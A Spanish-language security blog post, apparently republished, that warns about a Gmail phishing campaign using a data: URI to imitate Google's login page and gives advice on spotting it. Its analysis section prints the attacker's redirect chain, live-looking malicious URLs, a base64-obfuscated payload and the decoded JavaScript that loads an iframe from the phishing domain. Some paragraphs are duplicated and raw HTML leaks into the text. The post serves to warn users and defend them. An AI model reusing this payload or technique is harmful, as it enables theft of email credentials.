Nueva y sofisticada técnica de Phishing sobre Gmail
El último intento de phishing (engaño) que se está distribuyendo en Gmail imita de forma tan exacta la página de correo de Google que los expertos en seguridad han hecho saltar todas las alarmas: si durante estos días recibes un correo electrónico con un archivo PDF adjunto que, tras pulsarlo, te redirige al inicio de sesión de Google, bajo ningún concepto introduzcas tus datos. Aunque la URL parezca confiable, no lo es. El método es usar Data Uri en la barra de direcciones del navegador para que no muestra ningún error de certificado SSL/TLS y aparezca el subdominio accounts.google.com en la barra aunque no sea seguido de https.
En una nueva campaña del llamado phishing, un grupo de hackers ha comenzado a distribuir un correo electrónico infectado cuya única intención pasa por robar las cuentas de Gmail de las víctimas. El correo esconde una imagen que a primera vista parece un archivo adjunto, pero cuando el usuario pulsa sobre el fichero es automáticamente redirigido a una página que simula el aspecto del inicio de sesión de Gmail.
Por supuesto, la página a la que redirige el correo es una completa y total estafa. El aspecto de la página es idéntico al que tiene la web oficial para iniciar sesión en Gmail, pero a poco que nos fijemos en la barra de dirección URL veremos que antes del enlace de accounts.google.com aparece el texto de "data:text/html,". Si vemos eso, significa que estamos a punto de caer en el robo de la cuenta.
data:text/html,https://accounts/google.com
El aspecto que luce esta estafa de Gmail es exactamente el que se puede ver en la captura de pantalla que adjuntamos a continuación. A primera vista parece que se trata de la página oficial de Google para el inicio de sesión, pero basta con fijarnos en la URL para darnos cuenta de que hay algo que no está en orden.
Todo aquel que cae en la trampa no solamente se expone a perder el acceso a su cuenta de Gmail, sino que además debe enfrentarse al hecho de que todos los contactos con los que haya intercambiado algún mensaje en su correo electrónico recibirán esta misma estafa en su propio nombre. De hecho, ahí reside precisamente el mayor peligro de este engaño: el correo infectado lo envían nuestros propios contactos, quienes sin saberlo a su vez han sido antes infectados por otra víctima.
En todos estos ataques, lo que normalmente ocasiona el robo de las cuentas es la falta de seguridad por parte de los usuarios. Tanto esta campaña de robo de cuentas de Gmail como muchas otras que inevitablemente irán llegando en los próximos meses se pueden evitar por completo añadiendo los ajustes de seguridad que recomienda Google, especialmente el referido a la verificación en dos pasos.
Esta técnica de phishing utiliza algo llamado "URI de datos" para incluir un archivo completo en la barra de localización del navegador. Cuando miras hacia arriba en la barra de localización del navegador y ver 'data: text / html ... ..' que en realidad es una cadena de texto muy larga. Si amplísa la barra de direcciones verás
que hay un montón de espacios en blanco que he eliminado. Pero en la extrema derecha se puede ver el comienzo de lo que es un pedazo muy grande de texto. En realidad, este es un archivo que se abre en una nueva pestaña y crea una página de inicio de sesión de Gmail falsa completamente funcional que envía sus credenciales al atacante.
Como se puede ver en la parte izquierda de la barra de localización del navegador, en lugar de "https", tiene "data: text / html" seguido del habitual "https: //accounts.google.com ...". Si no estás prestando mucha atención, ignorarás el preámbulo 'data: text / html' y asumirás que la URL es segura.
que hay un montón de espacios en blanco que he eliminado. Pero en la extrema derecha se puede ver el comienzo de lo que es un pedazo muy grande de texto. En realidad, este es un archivo que se abre en una nueva pestaña y crea una página de inicio de sesión de Gmail falsa completamente funcional que envía sus credenciales al atacante.
Como se puede ver en la parte izquierda de la barra de localización del navegador, en lugar de "https", tiene "data: text / html" seguido del habitual "https: //accounts.google.com ...". Si no estás prestando mucha atención, ignorarás el preámbulo 'data: text / html' y asumirás que la URL es segura.
URL Falsa:
La URL correcta debe ser:
Análisis del Phishing
Recibes un adjunto con un supuesto PDF:
Para abrirlo aparece que tienes que iniciar sesión en Google:
ƒ curl -vvvv http://x5.to/A78
* Trying 112.78.125.184...
* Connected to x5.to (112.78.125.184) port 80 (#0)
> GET /A78 HTTP/1.1
> Host: x5.to
> User-Agent: curl/7.43.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Date: Fri, 11 Mar 2016 11:38:08 GMT
< Server: Apache/2.2.31
< Location: http://bowlanreedesntal.top/services/aboutus.htm
data/text:html en la URL:ƒ curl http://bowlanreedesntal.top/services/aboutus.htm
<meta http-equiv="Refresh" content="0; url=data:text/html,https://accounts.google.com/ServiceLogin?service=mail
<span class="pl-s">ZShuZXcgUmVnRXhwKCdcXGInK2MrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCczLjIuMTg9</span>
<span class="pl-s">IjE3IDE2IDE5IDIwIDIyIjsyMXsoMTUoKXsxNCAxPTMuMi45KFwnMVwnKTsxLjg9XCc3LzEwLTRc</span>
<span class="pl-s">JzsxLjExPVwnMTMgNFwnOzEuMjM9XCdcJzsyLjI0KFwnMzZcJylbMF0uMzUoMSl9KCkpfTM3KDM4</span>
<span class="pl-s">KXt9My4yLjMzLjMyPSI8NiAyNz1cXCIyNjovLzI1LjI4LzI5LzMxLjMwXFwiIDM5PVxcIjQwOiAw</span>
<span class="pl-s">OzM0OiA1JTsxMjo1JVxcIj48LzY+IjsnLDEwLDQxLCd8bGlua3xkb2N1bWVudHx3aW5kb3d8aWNv</span>
<span class="pl-s">bnwxMDB8aWZyYW1lfGltYWdlfHR5cGV8Y3JlYXRlRWxlbWVudHx4fHJlbHxoZWlnaHR8c2hvcnRj</span>
<span class="pl-s">dXR8dmFyfGZ1bmN0aW9ufGhhdmV8WW91fHRpdGxlfGJlZW58U2lnbmVkfHRyeXxvdXR8aHJlZnxn</span>
<span class="pl-s">ZXRFbGVtZW50c0J5VGFnTmFtZXxib3dsYW5yZWVkZXNudGFsfGh0dHB8c3JjfHRvcHxzZXJ2aWNl</span>
<span class="pl-s">c3xodG1sfGNvbnRhY3R1c3xvdXRlckhUTUx8Ym9keXx3aWR0aHxhcHBlbmRDaGlsZHxoZWFkfGNh</span>
<span class="pl-s">dGNofGV8c3R5bGV8Ym9yZGVyJy5zcGxpdCgnfCcpKSkK><span class="pl-pds">"</span></span></pre>
</div>
</blockquote>
<p>
El código Base64 resulta ser código JavaScript:</p>
<p>
</p>
<div class="highlight highlight-source-js">
<blockquote class="tr_bq">
<pre><span class="pl-c1">window</span>.<span class="pl-smi">document</span>.<span class="pl-c1">title</span> <span class="pl-k">=</span> <span class="pl-s"><span class="pl-pds">"</span>You have been Signed out<span class="pl-pds">"</span></span>;
<span class="pl-k">try</span> {
(<span class="pl-k">function</span>() {
<span class="pl-k">var</span> link <span class="pl-k">=</span> <span class="pl-c1">window</span>.<span class="pl-smi">document</span>.<span class="pl-c1">createElement</span>(<span class="pl-s"><span class="pl-pds">'</span>link<span class="pl-pds">'</span></span>);
<span class="pl-smi">link</span>.<span class="pl-c1">type</span> <span class="pl-k">=</span> <span class="pl-s"><span class="pl-pds">'</span>image/x-icon<span class="pl-pds">'</span></span>;
<span class="pl-smi">link</span>.<span class="pl-c1">rel</span> <span class="pl-k">=</span> <span class="pl-s"><span class="pl-pds">'</span>shortcut icon<span class="pl-pds">'</span></span>;
<span class="pl-smi">link</span>.<span class="pl-c1">href</span> <span class="pl-k">=</span> <span class="pl-s"><span class="pl-pds">'</span><span class="pl-pds">'</span></span>;
<span class="pl-c1">document</span>.<span class="pl-c1">getElementsByTagName</span>(<span class="pl-s"><span class="pl-pds">'</span>head<span class="pl-pds">'</span></span>)[<span class="pl-c1">0</span>].<span class="pl-c1">appendChild</span>(link)
}())
} <span class="pl-k">catch</span> (e) {}
<span class="pl-c1">window</span>.<span class="pl-smi">document</span>.<span class="pl-c1">body</span>.<span class="pl-smi">outerHTML</span> <span class="pl-k">=</span> <span class="pl-s"><span class="pl-pds">"</span>iframe src=<span class="pl-cce">\"</span>http://bowlanreedesntal.top/services/contactus.html<span class="pl-cce">\"</span> style=<span class="pl-cce">\"</span>border: 0;width: 100%;height:100%<span class="pl-cce">\"</span>>/iframe><span class="pl-pds">"</span></span>;</pre>
</blockquote>
<pre> </pre>
</div>
<p>
Con el resultado final de la carga de un iframe</p>
<p>
<br></p>
<p>
Fuentes:</p>
<p>
<a href="http://computerhoy.com/noticias/internet/cuidado-parece-gmail-pero-esta-pagina-esta-robando-tu-cuenta-57154">http://computerhoy.com/noticias/internet/cuidado-parece-gmail-pero-esta-pagina-esta-robando-tu-cuenta-57154</a> </p>
<p>
<a href="https://gist.github.com/timruffles/5c76d2b61c88188e77f6#gistcomment-1968194">https://gist.github.com/timruffles/5c76d2b61c88188e77f6#gistcomment-1968194</a></p>
<p>
<a href="http://blog.greggman.com/blog/getting-phished/">http://blog.greggman.com/blog/getting-phished/</a></p>
<p>
<a href="https://www.wordfence.com/blog/2017/01/gmail-phishing-data-uri/">https://www.wordfence.com/blog/2017/01/gmail-phishing-data-uri/</a> <br></p>
Via: blog.elhacker.net
Nueva y sofisticada técnica de Phishing sobre Gmail
Reviewed by Zion3R
on
13:57
Rating:
Reviewed by Zion3R
on
13:57
Rating:
